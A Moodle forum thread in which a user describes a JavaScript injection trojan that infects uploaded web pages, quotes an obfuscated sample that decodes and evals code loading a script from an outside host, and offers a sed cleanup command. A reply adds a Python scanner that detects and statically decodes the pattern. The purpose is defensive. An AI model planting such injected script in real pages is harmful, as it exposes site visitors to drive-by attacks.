Trojan:JS Type Obfuscation Exploits

by John Macklin -
Number of replies: 1

Lately I have seen a few Moodle issues where the current stable version of Moodle 1.9.4-1.9.5 became exploited by JavaScript obfuscation code. What this means is that an unsuspecting user can upload an infected web executable php, asp or cgi script via ftp or Front Page. Most likely these types of attacks come from unsuspecting Windows users that have unknowingly been infected by a common Trojan:JS. The binary code on an infected computer will actually write (inject) a JavaScript formatted similar to this one in a web page:

 <script Xlanguage=javascript><!--
(function(){var tDBt='v_61r_20a_3d_22S_63rip_74_45_6eg_69ne_22_2cb_3d_22_56e_72si_6fn_28)+_22_2c_6a_3d_22_22_2c_75_3
dnavigator_2e_75se_72A_67ent(u_2e_69n_64exOf(_22Ch_72_6f_6de_22)_3c0_29_26_26_28u_2ei_6e_64exOf_28_22W_69_6e_22)_3e0
_26_26(u_2eindexO_66(_22NT_206_22)_3c0)_26_26_28eindexOf(_22mi_65k_3d_31_22)_3c0)_26_26_28typeof_28_7arvzts
_21_3d_74_7bz_72vzts_3d_22A_22_3b_65_76_61l(_22_69f(window_2e_22+a+_22)j_3dj_2b_22+_61+_22M_61_6a_6fr_22+b_2ba
+_22_4din_6f_72_22+b+a+_22_42ui_6cd_22_2bb+_22j_3b_22)_3bdocument_2e_77_72i_74e(_22_3cscript_20src_3d_2f_2fmart_22_2b_22uz
2ecn_2f_76i_64_2f_3fid_3d_22+_6a+_22_3e_3c_5c_2fsc_72_69pt_3e_22)_3b_7d';var lSP=tDBt.replace(/_/g,'%'); var UIP0u=unescape(lSP);eval(UIP0u)})();
--></script>

Note:

The above Code encoded by the Java Script escape method has been mangled to make it harmless. With JS::Escape all spaces, punctuation, accented characters, and any other non-ASCII characters are replaced with %xx encoding, where xx is equivalent to the hexadecimal number representing the character.

For example, a space is returned as "%20." Characters with a value greater than 255 are stored using the %uxxxx format. This Java Script Trojan is highly disturbing due to the manner that it occurs and attempts to potentially wreck your computer to an alarming degree thru JS Code Obfuscation.

Unsuspecting site owners running anti-malware countermeasures will be warned upon visiting a page on an exposed site. It is very simple to identify via a simple page source view from the browser. One can actually physically see the JavaScript payload embedded in the page headers or near the body of the page.

So the question that may be asked is how exactly does this all occur?

The answer is extremely basic: when the particular chosen computer from where you upload data thru FTP/fp or CGI is infected, it injects some JavaScript to all executable web files (jsp, asp, html, php, etc). Most of the time the targets are index pages (index.html, index.php, index.jsp, and index.asp).

Can Java Script Trojans Be Stopped:

Shell scripts for Linux servers can actually remove these annoying injected JavaScripts since they can be detected thru scanning for the JavaScript function "unescape" method which decodes String objects encoded with the JS:Escape method. You can run a basic shell script that simply evaluates a simple command find ./ -type f -exec sed -i '/unescape/d' {} \;. This command serves the purpose of literally removing all the lines with pattern "unescape". It really depends on many circumstances but Java Trojans like this one can be cleaned from infected files.

JS:Trojan Counter Measures:

I would recommend having ftp passwords changed as soon as possible; also, users of sites should make sure they are running current antiviral measures on Windows. I suspect the last one I saw recently actually came via Front Page from a Windows user. This can mean the source of the files were compromised in the beginning via an infected Windows host. Most of these that are known of today are usually trying to exploit a browser vulnerability of some kind via client-side JavaScript.

Here is a link to a list of known JS Exploits:
http://www.viruslist.com/en/virusesdescribed?chapter=153318100&page=1

Simply the threat is low here since Trojan.JS (Obfuscation Scripts) are a Trojan Horse JavaScript that causes Microsoft Internet Explorer and other browsers to open a new window to a particular Web page usually thru an embedded <IFRAME> that has a non visible style or css class thus hiding the page redirection from the user.

Here is the link to the current script I have that can detect the presence of the "unescape" Java decoding method and some basic IFRAME tag redirections.

Sincerely I hope this helps my friends in the Moodle Community to whom I devote much of my time, effort and resources.

Scanner Links:

http://macklin.homelinux.net/scanners/JsObfusScan.tgz

http://macklin.homelinux.net/scanners/README.txt
Average rating: Useful (2)
In reply to John Macklin
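A static scanner for the injection pattern quoted in the post above, added here as an example; it is not the post's own code and not John's JsObfusScan script. It looks for the three pieces the quoted sample combines (a long single-quoted literal full of `_xx` hex escapes, the `.replace(/_/g,'%')` that turns them back into `%xx`, and `unescape()` feeding `eval()`), plus the hidden `<IFRAME>` the post describes, and it decodes the escaped literal the same way `unescape()` would so a responder can read the payload without executing it. Unlike the `sed '/unescape/d'` one-liner it only reports and never modifies files, so a legitimate page that happens to call `unescape()` is left intact. The threshold `MIN_ESCAPES`, the file-extension list and both sample pages are assumptions constructed for the example; the sample payload points at the reserved name example.invalid.

```python
"""Scanner for the '_xx'-escaped JavaScript injection quoted in the post above.

Added example: not the original post's code and not the author's JsObfusScan
script. It reports suspect files and statically decodes the escaped literal so
a responder can read the payload without running it. MIN_ESCAPES, the
extension list and the sample pages are assumptions made for this example.
"""
import re
import sys
from pathlib import Path

# A single-quoted literal of at least 40 characters; candidates are then
# checked for the '_xx' hex escapes the injection uses in place of '%xx'.
QUOTED_LITERAL = re.compile(r"'([^'\n]{40,})'")
UNDERSCORE_HEX = re.compile(r"_[0-9a-fA-F]{2}")
MIN_ESCAPES = 8  # assumption: fewer escapes than this is unlikely to be the payload

# The decode step the injection itself performs: '_' -> '%', then unescape().
REPLACE_CALL = re.compile(r"\.replace\(\s*/_/g\s*,\s*['\"]%['\"]\s*\)")
UNESCAPE_CALL = re.compile(r"\bunescape\s*\(")
EVAL_CALL = re.compile(r"\beval\s*\(")
# Hidden <iframe> used for the silent redirection the post describes.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(display\s*:\s*none|visibility\s*:\s*hidden|"
    r"(width|height)\s*=\s*[\"']?0\b)",
    re.IGNORECASE,
)
WEB_EXTENSIONS = {".html", ".htm", ".php", ".jsp", ".asp", ".js", ".cgi"}  # assumption


def unescape_js(text: str) -> str:
    """Python equivalent of JavaScript unescape(): %xx -> chr(0xxx), %uXXXX -> chr(0xXXXX)."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})", repl, text)


def decode_underscore_escaped(literal: str) -> str:
    """Mirror the obfuscator's decode step without eval: '_' -> '%', then unescape."""
    return unescape_js(literal.replace("_", "%"))


def scan_text(text: str) -> dict:
    """Classify one file's content; return verdict, indicators and decoded payloads."""
    indicators, decoded = [], []
    for literal in QUOTED_LITERAL.findall(text):
        if len(UNDERSCORE_HEX.findall(literal)) >= MIN_ESCAPES:
            indicators.append("underscore_escaped_literal")
            decoded.append(decode_underscore_escaped(literal))
    if REPLACE_CALL.search(text):
        indicators.append("replace_underscore_to_percent")
    if UNESCAPE_CALL.search(text):
        indicators.append("unescape_call")
    if EVAL_CALL.search(text):
        indicators.append("eval_call")
    # Check both the raw page and what the escaped literal would write into it.
    if any(HIDDEN_IFRAME.search(s) for s in [text] + decoded):
        indicators.append("hidden_iframe")

    has_literal = "underscore_escaped_literal" in indicators
    if has_literal and ("replace_underscore_to_percent" in indicators or "eval_call" in indicators):
        verdict = "infected"
    elif "hidden_iframe" in indicators or ("unescape_call" in indicators and "eval_call" in indicators):
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": indicators, "decoded": decoded}


def scan_tree(root: Path) -> dict:
    """Report every web file under root that is not clean; nothing is modified."""
    reports = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXTENSIONS:
            report = scan_text(path.read_text(errors="replace"))
            if report["verdict"] != "clean":
                reports[str(path)] = report
    return reports


# Constructed sample: the injection pattern from the post with a harmless
# placeholder payload (example.invalid), not a real infected page.
SAMPLE_INJECTED_PAGE = """<html><head><title>Course</title>
<script language=javascript><!--
(function(){var tDBt='d_6fcument_2ewrite_28_22_3ciframe src_3d_2f_2fexample_2einvalid_2f style_3ddisplay_3anone_3e_3c_2fiframe_3e_22_29';var lSP=tDBt.replace(/_/g,'%');var u=unescape(lSP);eval(u)})();
--></script></head><body><p>Welcome</p></body></html>
"""

# Constructed sample: a legitimate page that uses unescape(); the post's
# sed one-liner would delete this line, the scanner leaves it alone.
SAMPLE_CLEAN_PAGE = """<html><body><script>
var label = unescape("%3Cb%3ECourse%3C%2Fb%3E");
document.getElementById('title').innerHTML = label;
</script></body></html>
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, report in scan_tree(Path(sys.argv[1])).items():
            print(path, report["verdict"], report["indicators"])
            for payload in report["decoded"]:
                print("  decoded:", payload)
    else:
        for name, page in (("injected", SAMPLE_INJECTED_PAGE), ("clean", SAMPLE_CLEAN_PAGE)):
            print(name, scan_text(page))
```

Run it with a document root as the argument to list non-clean files under that tree, or with no argument to see the two built-in samples classified. Reporting rather than deleting matters here: the `sed` one-liner strips every line containing "unescape", which breaks legitimate scripts and leaves the injected `<script>` wrapper behind, whereas a report lets you restore the affected index pages from a known-good copy and rotate the FTP credentials, which the post already recommends.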

Re: Trojan:JS Type Obfuscation Exploits

by Helen Foster -
Hi John,

Thanks for your post about JavaScript Trojans and how they can be prevented. I've added a link to this discussion from the Security FAQ. Please feel free to add further information to the documentation wiki if necessary.